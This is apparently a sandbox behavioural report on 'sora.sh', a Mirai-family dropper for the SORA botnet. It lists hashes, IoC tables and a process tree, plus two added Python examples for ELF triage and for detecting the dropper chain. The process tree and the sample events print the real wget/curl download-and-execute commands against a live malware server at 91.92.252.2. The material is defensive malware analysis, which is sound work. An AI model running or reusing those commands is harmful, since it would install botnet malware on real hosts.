Analysis

max time kernel: 18s
max time network: 128s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 03-08-2024 05:14
Static task: static1
Behavioral task behavioral1: sample sora.sh on ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample sora.sh on debian9-armhf-20240611-en
Behavioral task behavioral3: sample sora.sh on debian9-mipsbe-20240611-en

The behavioral results on this page are from behavioral1 (the amd64 guest, matching the platform and resource above); the armhf and mipsbe tasks are listed but their output is not included here.
General

Target: sora.sh
Size: 2KB
MD5: fe9fcc98f0d2d8350fd699bb3edf3419
SHA1: 5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
SHA256: faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
SHA512: 4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config

Extracted (listed twice on the original page): family mirai, botnet SORA
Signatures

Executes dropped EXE (14 IoCs)
The same dropped path is executed fourteen times, once per architecture build fetched by the script.

  ioc          pid   process
  /tmp/robben  1512  robben
  /tmp/robben  1518  robben
  /tmp/robben  1524  robben
  /tmp/robben  1530  robben
  /tmp/robben  1535  robben
  /tmp/robben  1541  robben
  /tmp/robben  1547  robben
  /tmp/robben  1552  robben
  /tmp/robben  1558  robben
  /tmp/robben  1564  robben
  /tmp/robben  1570  robben
  /tmp/robben  1576  robben
  /tmp/robben  1581  robben
  /tmp/robben  1587  robben

YARA rule matches (4 IoCs; the signature title was lost in extraction, only the rule table survives)

  resource     yara_rule
  /tmp/robben  upx
  /tmp/robben  upx
  /tmp/robben  upx
  /tmp/robben  upx

Writes file to tmp directory (26 IoCs)
Malware often drops required files in the /tmp directory. Every entry is "File opened for modification"; the process column shows which downloader wrote each file. Note that /tmp/robben is written by sora.sh itself, not by wget or curl.

  ioc                 process
  /tmp/sora.sh4       curl
  /tmp/sora.mips      wget
  /tmp/sora.arm5      curl
  /tmp/sora.arm6      curl
  /tmp/sora.i686      curl
  /tmp/sora.arm5      wget
  /tmp/sora.ppc       curl
  /tmp/sora.i468      curl
  /tmp/sora.ppc       wget
  /tmp/sora.sh4       wget
  /tmp/sora.arm7      wget
  /tmp/sora.m68k      wget
  /tmp/sora.x86_64    curl
  /tmp/sora.arm6      wget
  /tmp/sora.ppc440fp  curl
  /tmp/sora.x86       curl
  /tmp/sora.mips      curl
  /tmp/sora.arm4      curl
  /tmp/sora.m68k      curl
  /tmp/sora.x86       wget
  /tmp/sora.i686      wget
  /tmp/robben         sora.sh
  /tmp/sora.mpsl      curl
  /tmp/sora.arm7      curl
  /tmp/sora.x86_64    wget
  /tmp/sora.mpsl      wget
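Two of the signatures above come down to static properties of the dropped file: the architecture it was built for (the script's sora.x86 / sora.mips / sora.arm7 naming can be checked against the ELF header rather than trusted) and whether it is UPX-packed (the rule that matched /tmp/robben). The following is an added example of that triage, written for this page and not the sandbox's own rule logic. The UPX check looks for the "UPX!" l_magic marker that stock UPX writes into packed files; Mirai builders routinely patch that marker out, so a negative result proves nothing. The sample bytes are a constructed minimal ELF header, not the real /tmp/robben.

```python
"""Static triage of a dropped ELF: architecture from the header, plus a
check for the stock UPX marker.  Added example, not the sandbox's rule code."""
import struct

# e_machine values from the ELF specification for the architectures named in
# the dropper's download list (sora.x86, sora.m68k, sora.mips/mpsl, sora.ppc,
# sora.arm*, sora.sh4, sora.x86_64).
ELF_MACHINES = {
    0x03: "x86", 0x04: "m68k", 0x08: "mips", 0x14: "ppc",
    0x28: "arm", 0x2A: "sh4", 0x3E: "x86_64",
}


def triage_elf(data: bytes) -> dict:
    """Parse e_ident (class, data encoding) and e_machine; flag the UPX marker.

    Returns {"elf": False} for anything that is not an ELF image, e.g. the
    shell script itself or an HTTP error page saved by curl -O.
    """
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return {"elf": False}
    ei_class, ei_data = data[4], data[5]          # ELFCLASS32/64, ELFDATA2LSB/MSB
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return {"elf": False}
    fmt = ("<" if ei_data == 1 else ">") + "H"     # e_machine is a 16-bit field at offset 18
    (e_machine,) = struct.unpack_from(fmt, data, 18)
    return {
        "elf": True,
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": ELF_MACHINES.get(e_machine, f"unknown(0x{e_machine:02x})"),
        # l_magic of UPX's l_info header.  Absent in re-packed/patched samples.
        "upx_marker": b"UPX!" in data,
    }


def build_sample(machine: int, little_endian: bool, upx: bool) -> bytes:
    """Constructed 32-bit ELF header with no real code, for exercising triage_elf."""
    hdr = bytearray(52)                           # sizeof(Elf32_Ehdr)
    hdr[0:4] = b"\x7fELF"
    hdr[4] = 1                                    # ELFCLASS32
    hdr[5] = 1 if little_endian else 2            # ELFDATA2LSB / ELFDATA2MSB
    hdr[6] = 1                                    # EV_CURRENT
    struct.pack_into(("<" if little_endian else ">") + "H", hdr, 18, machine)
    marker = b"UPX!" if upx else b"\x00\x00\x00\x00"
    return bytes(hdr) + b"\x00" * 16 + marker + b"\x00" * 28


if __name__ == "__main__":
    # Mirrors what the script fetches: a big-endian MIPS build ("mips") that is
    # UPX-packed, and a plain little-endian x86 build.
    print(triage_elf(build_sample(0x08, little_endian=False, upx=True)))
    print(triage_elf(build_sample(0x03, little_endian=True, upx=False)))
    print(triage_elf(b"#!/bin/sh\n"))
```

Run it over each sora.* file the sandbox retained and compare the reported machine against the file-name suffix; a "mips" name with a little-endian header is the "mpsl" build, and a 212-byte "ELF" that fails the magic check is a server error page, not a payload.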
Processes

Every iteration of the tree has the same shape: sora.sh fetches one architecture build of the payload with wget and then again with curl -O, runs cat on the downloaded file (the IoC table attributes the write to /tmp/robben to the sora.sh process rather than to cat, consistent with a shell redirect such as cat sora.<arch> > robben in the script), marks the contents of /tmp executable, and runs ./robben with the argument "Payload". The chmod argument lists are the sorted contents of /tmp, i.e. the script ran chmod +x with a shell glob; each iteration's list is the previous one plus the newly fetched sora.<arch> file, so after the first iteration only the sora.* entries are spelled out below. The script does not check the host's architecture: ./robben is executed once per build, including builds that cannot run on this amd64 guest. Three wget invocations (sora.i468, sora.arm4, sora.ppc440fp) carry no "Writes file to tmp directory" tag, meaning no file write was recorded for them, while the curl request for the same URL did write a file. File names, including sora.i468, are the script's own spelling.

/tmp/sora.sh (PID 1503) [Writes file to tmp directory]
  /usr/bin/wget: wget http://91.92.252.2/bins/sora.x86 (PID 1504) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.x86 (PID 1509) [Writes file to tmp directory]
  /bin/cat: cat sora.x86 (PID 1510)
  /bin/chmod: chmod +x config-err-8JBWpx netplan_uuqr82fq robben snap-private-tmp sora.sh sora.x86 ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-GUQvv0 (PID 1511)
  /tmp/robben: ./robben Payload (PID 1512) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.mips (PID 1514) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.mips (PID 1515) [Writes file to tmp directory]
  /bin/cat: cat sora.mips (PID 1516)
  /bin/chmod: chmod +x <same /tmp listing as above; sora files now: sora.mips sora.sh sora.x86> (PID 1517)
  /tmp/robben: ./robben Payload (PID 1518) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.x86_64 (PID 1520) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.x86_64 (PID 1521) [Writes file to tmp directory]
  /bin/cat: cat sora.x86_64 (PID 1522)
  /bin/chmod: chmod +x <sora files now: sora.mips sora.sh sora.x86 sora.x86_64> (PID 1523)
  /tmp/robben: ./robben Payload (PID 1524) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.i468 (PID 1526)
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.i468 (PID 1527) [Writes file to tmp directory]
  /bin/cat: cat sora.i468 (PID 1528)
  /bin/chmod: chmod +x <sora files now: sora.i468 sora.mips sora.sh sora.x86 sora.x86_64> (PID 1529)
  /tmp/robben: ./robben Payload (PID 1530) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.i686 (PID 1531) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.i686 (PID 1532) [Writes file to tmp directory]
  /bin/cat: cat sora.i686 (PID 1533)
  /bin/chmod: chmod +x <sora files now: sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64> (PID 1534)
  /tmp/robben: ./robben Payload (PID 1535) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.mpsl (PID 1537) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.mpsl (PID 1538) [Writes file to tmp directory]
  /bin/cat: cat sora.mpsl (PID 1539)
  /bin/chmod: chmod +x <sora files now: sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64> (PID 1540)
  /tmp/robben: ./robben Payload (PID 1541) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.arm4 (PID 1543)
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.arm4 (PID 1544) [Writes file to tmp directory]
  /bin/cat: cat sora.arm4 (PID 1545)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64> (PID 1546)
  /tmp/robben: ./robben Payload (PID 1547) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.arm5 (PID 1548) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.arm5 (PID 1549) [Writes file to tmp directory]
  /bin/cat: cat sora.arm5 (PID 1550)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64> (PID 1551)
  /tmp/robben: ./robben Payload (PID 1552) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.arm6 (PID 1554) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.arm6 (PID 1555) [Writes file to tmp directory]
  /bin/cat: cat sora.arm6 (PID 1556)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64> (PID 1557)
  /tmp/robben: ./robben Payload (PID 1558) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.arm7 (PID 1560) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.arm7 (PID 1561) [Writes file to tmp directory]
  /bin/cat: cat sora.arm7 (PID 1562)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64> (PID 1563)
  /tmp/robben: ./robben Payload (PID 1564) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.ppc (PID 1566) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.ppc (PID 1567) [Writes file to tmp directory]
  /bin/cat: cat sora.ppc (PID 1568)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64> (PID 1569)
  /tmp/robben: ./robben Payload (PID 1570) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.ppc440fp (PID 1572)
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.ppc440fp (PID 1573) [Writes file to tmp directory]
  /bin/cat: cat sora.ppc440fp (PID 1574)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64> (PID 1575)
  /tmp/robben: ./robben Payload (PID 1576) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.m68k (PID 1577) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.m68k (PID 1578) [Writes file to tmp directory]
  /bin/cat: cat sora.m68k (PID 1579)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64> (PID 1580)
  /tmp/robben: ./robben Payload (PID 1581) [Executes dropped EXE]

  /usr/bin/wget: wget http://91.92.252.2/bins/sora.sh4 (PID 1583) [Writes file to tmp directory]
  /usr/bin/curl: curl -O http://91.92.252.2/bins/sora.sh4 (PID 1584) [Writes file to tmp directory]
  /bin/cat: cat sora.sh4 (PID 1585)
  /bin/chmod: chmod +x <sora files now: sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64> (PID 1586)
  /tmp/robben: ./robben Payload (PID 1587) [Executes dropped EXE]
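The process tree above is the whole detection opportunity for this family: a shell in a world-writable directory that downloads with wget/curl, chmods, and executes a freshly written file, repeated once per architecture suffix. The following added example (written for this page, not the sandbox's logic) runs that chain detection over a constructed process log. The event tuples (pid, ppid, cwd, cmdline) are a simplified format modelled on the tree above, with the report's real 91.92.252.2 URLs for the first three iterations and two constructed benign events under a hypothetical /home/ops; a real auditd or EDR export needs its own parsing first. It also pulls the URLs and dropped paths out as IoCs.

```python
"""Detect the multi-architecture Mirai dropper chain (download to a scratch
directory, chmod +x, execute from that directory) per parent process, and
extract the URLs and dropped paths as IoCs.  Added example; the event format
and the sample events are constructed for illustration."""
import re
from collections import defaultdict

SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# wget/curl with an http(s) URL anywhere on the command line.
DOWNLOAD_RE = re.compile(r"^(?:wget|curl)\b.*?(https?://\S+)")
# chmod that adds an execute bit: symbolic (+x, a+x, u+rwx) or an octal mode
# with an execute bit in any triplet.  A heuristic, sufficient for droppers.
CHMOD_EXEC_RE = re.compile(r"^chmod\s+(?:\S*\+\S*x\S*|[0-7]*[1357][0-7]*)\s+")
# Execution of a relative path or of something under a scratch directory.
EXEC_RE = re.compile(r"^(\./\S+|/tmp/\S+|/var/tmp/\S+|/dev/shm/\S+)")

# Constructed sample: the first three iterations of the report's tree (x86,
# mips, x86_64) plus two benign events that must not trigger.
SAMPLE_EVENTS = [
    (1503, 1,    "/tmp", "/tmp/sora.sh"),
    (1504, 1503, "/tmp", "wget http://91.92.252.2/bins/sora.x86"),
    (1509, 1503, "/tmp", "curl -O http://91.92.252.2/bins/sora.x86"),
    (1510, 1503, "/tmp", "cat sora.x86"),
    (1511, 1503, "/tmp", "chmod +x robben sora.sh sora.x86"),
    (1512, 1503, "/tmp", "./robben Payload"),
    (1514, 1503, "/tmp", "wget http://91.92.252.2/bins/sora.mips"),
    (1515, 1503, "/tmp", "curl -O http://91.92.252.2/bins/sora.mips"),
    (1516, 1503, "/tmp", "cat sora.mips"),
    (1517, 1503, "/tmp", "chmod +x robben sora.mips sora.sh sora.x86"),
    (1518, 1503, "/tmp", "./robben Payload"),
    (1520, 1503, "/tmp", "wget http://91.92.252.2/bins/sora.x86_64"),
    (1521, 1503, "/tmp", "curl -O http://91.92.252.2/bins/sora.x86_64"),
    (1522, 1503, "/tmp", "cat sora.x86_64"),
    (1523, 1503, "/tmp", "chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64"),
    (1524, 1503, "/tmp", "./robben Payload"),
    # Constructed benign noise: an admin working in a home directory.
    (2000, 1999, "/home/ops", "curl -O https://example.org/tool.tar.gz"),
    (2001, 1999, "/home/ops", "chmod +x ./build.sh"),
]


def in_scratch_dir(cwd: str) -> bool:
    return any(cwd == d or cwd.startswith(d + "/") for d in SCRATCH_DIRS)


def analyse(events):
    """Group download / chmod / exec stages by parent pid; alert when all three
    occur under one parent in a scratch directory.  Returns a report dict."""
    stages = defaultdict(lambda: {"download": [], "chmod": False, "exec": []})
    urls, dropped = set(), set()
    for pid, ppid, cwd, cmd in events:
        cmd = cmd.strip()
        m = DOWNLOAD_RE.match(cmd)
        if m and in_scratch_dir(cwd):
            url = m.group(1)
            urls.add(url)
            dropped.add(f"{cwd}/{url.rsplit('/', 1)[-1]}")   # wget / curl -O save by basename
            stages[ppid]["download"].append(url)
            continue
        if CHMOD_EXEC_RE.match(cmd) and in_scratch_dir(cwd):
            stages[ppid]["chmod"] = True
            continue
        m = EXEC_RE.match(cmd)
        if m and in_scratch_dir(cwd):
            path = m.group(1)
            if path.startswith("./"):
                path = f"{cwd}/{path[2:]}"
            stages[ppid]["exec"].append(path)
            dropped.add(path)

    alerts = []
    for ppid, s in stages.items():
        if s["download"] and s["chmod"] and s["exec"]:
            # A multi-architecture loader fetches name.x86, name.mips, name.arm7 ...
            # from one prefix; count the distinct suffixes as the arch fan-out.
            names = [u.rsplit("/", 1)[-1] for u in s["download"]]
            suffixes = {n.rsplit(".", 1)[-1] for n in names if "." in n}
            alerts.append({
                "parent_pid": ppid,
                "downloads": len(s["download"]),
                "arch_variants": len(suffixes),
                "multi_arch": len(suffixes) >= 3,
                "executed": sorted(set(s["exec"])),
            })
    return {"alerts": alerts, "urls": sorted(urls), "dropped": sorted(dropped)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_EVENTS), indent=2))
```

Keying the stages on the parent pid rather than on the command line is what makes this robust to the script's retries: wget and curl both fetch the same URL, but only one parent (the shell) ties download, chmod and exec together. The multi_arch flag is the strongest signal here; a single download-chmod-exec in /tmp is something build and install scripts also do.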
Downloads

Six of the files fetched during the run were retained by the sandbox. They are listed by hash only; the page does not say which URL each one came from.

1. Filesize: 27KB
   MD5: 545cc0b3e5dae8244debe55a41e14a9f
   SHA1: 101ad459b5b114c0a79c458cd0c0d2374a3698a1
   SHA256: a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91
   SHA512: 1e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611

2. Filesize: 28KB
   MD5: 8d068eba527935d34fbff880f4cf7530
   SHA1: 82f50f55fb025735b62fca14362600132b21c2d0
   SHA256: bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147
   SHA512: 6cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14

3. Filesize: 28KB
   MD5: fa8042bc292cb4403494d779833de7ca
   SHA1: a78431e9ef2fac7f3a909c06a81e643369a17ee4
   SHA256: 1ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5
   SHA512: fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82

4. Filesize: 212B
   MD5: 83ab6cd9a67528bbc6f4f360cb7f8d83
   SHA1: 07e8f17209e0569aab39f062568ff0090d9b20d4
   SHA256: 3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
   SHA512: 171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f

5. Filesize: 28KB
   MD5: a9d839dd97abb474595bc7e18157aa64
   SHA1: 82c1ec7eae6dd1bc7dcfd1e89911d328c899c885
   SHA256: 3bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d
   SHA512: 4311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993

6. Filesize: 64KB
   MD5: 5092e7b4c0b2e9e418ca596ddad29165
   SHA1: 41edb1d01dcd2bacfd437cad4af32791e473e1c0
   SHA256: 43c3fe213b5a161348b2036c0bdf95b5c72d48d55ed3e2557a91a078de5bb845
   SHA512: d4004f22ad4142cef16dd5dea79598b69b94667dac47affaee45f7a16c64ee859654930315d1cec9aaf374f1d62a1c34239f8a8b42f41855f353ffd6d773e742